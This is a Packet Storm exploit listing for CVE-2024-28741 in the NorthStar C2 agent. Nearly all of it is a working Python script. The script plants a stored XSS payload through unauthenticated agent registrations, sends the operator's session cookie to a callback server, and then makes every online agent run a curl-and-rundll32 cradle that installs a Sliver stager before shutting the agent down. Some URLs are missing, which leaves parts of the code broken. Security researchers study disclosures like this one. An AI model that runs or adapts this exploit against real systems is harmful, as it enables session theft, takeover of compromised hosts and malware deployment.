

NorthStar C2 Agent 1.0 Cross Site Scripting / Remote Command Execution

NorthStar C2 agent version 1.0 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page. This cross site scripting payload can be leveraged to execute commands on NorthStar C2 agents.

Packet Storm
# Exploit Title: NorthStar C2 agent RCE via stored XSS# Date: 2024-03-11# Exploit Author: @_chebuya# Software Link: Version: v1.0# Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-28741# Description: NorthStar C2 applies insufficient sanitization on agent registration routes, allowing an unauthenticated attacker to send multiple malicious agent registration requests to the teamserver to incrementally build a functioning javascript payload in the logs web page.  This XSS can be leveraged to execute commands on NorthStar C2 agents# Blog: http.server import BaseHTTPRequestHandler, HTTPServerfrom bs4 import BeautifulSoupimport requestsimport base64import threadingimport timeimport osclass Collector(BaseHTTPRequestHandler):    def do_GET(self):        cookie = self.path.split("=")[1]        print("Cookie: " + cookie)        self.send_response(200)        self.end_headers()        self.wfile.write(b"")        background_thread = threading.Thread(target=steal_agents, args=(cookie,))        background_thread.start()        self.server.shutdown()def agent_execute_command(agent_id, csrf_token, headers, command):    data = {        'slave': agent_id,        'command': command,        'sid': agent_id,        'token': csrf_token    }    r = + '/functions/setCommand.nonfunction.php', headers=headers, data=data)    while True:        r = requests.get(target_url +  f"/getresponse.php?slave={agent_id}", headers=headers)        if len(r.text) != 0 or command == "die":            break                time.sleep(1)def steal_agents(cookie):    headers = {        "Cookie": f"PHPSESSID={cookie}"    }    r = requests.get(target_url + "/clients.php", headers=headers)    soup = BeautifulSoup(r.text, 'html.parser')    rows = soup.find_all('tr')    agent_ids = []    hostnames = []    for row in rows:        cells = row.find_all('td')        if len(cells) != 9:            continue        status = cells[7].text.strip()        if status != 'Online':            continue        agent_ids.append(cells[1].text.strip())        hostnames.append(cells[5].text.strip())    script_tags = soup.find_all('script')    csrf_token = None    for script_tag in script_tags:        if 'csrfToken' in script_tag.text:            csrf_token = script_tag.text.split('"')[1]            break    if csrf_token:        print("CSRF Token:", csrf_token)    else:        print("CSRF Token not found")        return    for i in range(len(agent_ids)):        agent_id = agent_ids[i]        hostname = hostnames[i]        print(f"Stealing {hostname} ({agent_id})...")        print("Enabling shell mode")        agent_execute_command(agent_id, csrf_token, headers, "enablecmd")        print(f"Running sliver cradle: {cradle_command}")        agent_execute_command(agent_id, csrf_token, headers, cradle_command)        print("Disabling shell mode")        agent_execute_command(agent_id, csrf_token, headers, "disablecmd")        print("Sending suicide to slave")        agent_execute_command(agent_id, csrf_token, headers, "die")        print("Exploit finished, exiting")    os._exit(0)def xor_encryption(text, key):    encrypted_text = ""        for i in range(len(text)):        encrypted_text += chr(ord(text[i]) ^ ord(key[i % len(key)]))        return encrypted_textdef generate_sid(sid):    encrypted_sid = xor_encryption(sid, "northstar")    return base64.urlsafe_b64encode(encrypted_sid.encode()).decode()def exploit(target_url, callback_url):    target_url = target_url.rstrip("/") + "/login.php"    protocol = callback_url.split(":")[0] + "://"    host = callback_url.split("/")[2].split(":")[0]    h1, h2 = host[:len(host)//2], host[len(host)//2:]        if callback_url.count(":") == 2:        port = callback_url.split(":")[2]    else:        if protocol == "https://":            port = "443"        else:            port = "80"    sid_payloads = ["N*/</script><q", "N*/i.src=u/*q", "N*/new Image;/*q", "N*/var i=/*q", "N*/s+h+p+'/'+c;/*q", "N*/var u=/*q", f"N*/'{protocol}';/*q", "N*/var s=/*q", f"N*/':{port}';/*q", "N*/var p=/*q", "N*/a+b;/*q", "N*/var h=/*q", f"N*/'{h2}';/*q", "N*/var b=/*q", f"N*/'{h1}';/*q", "N*/var a=/*q", "N*/d.cookie;/*q", "N*/var c=/*q", "N*/document;/*q", "N*/var d=/*q", "N</td><script>/*q"]    for sid in sid_payloads:        print(sid)        params = {            'sid': generate_sid(sid)        }        requests.get(target_url, params=params, verify=False)def run(port):    server_address = ('', int(port))    httpd = HTTPServer(server_address, Collector)    print(f'Server running on port {port}')    httpd.serve_forever()cradle_command = r"curl > c:\users\public\stager.dll & rundll32 c:\users\public\stager.dll,inject & echo DONE"callback_host = ""callback_port = "8080"target_url = ""callback_url = f"http://{callback_host}:{callback_port}"print("Sending malicious agent registrations...")exploit(target_url, callback_url)print("Registrations finished, waiting for execution...")run(callback_port)

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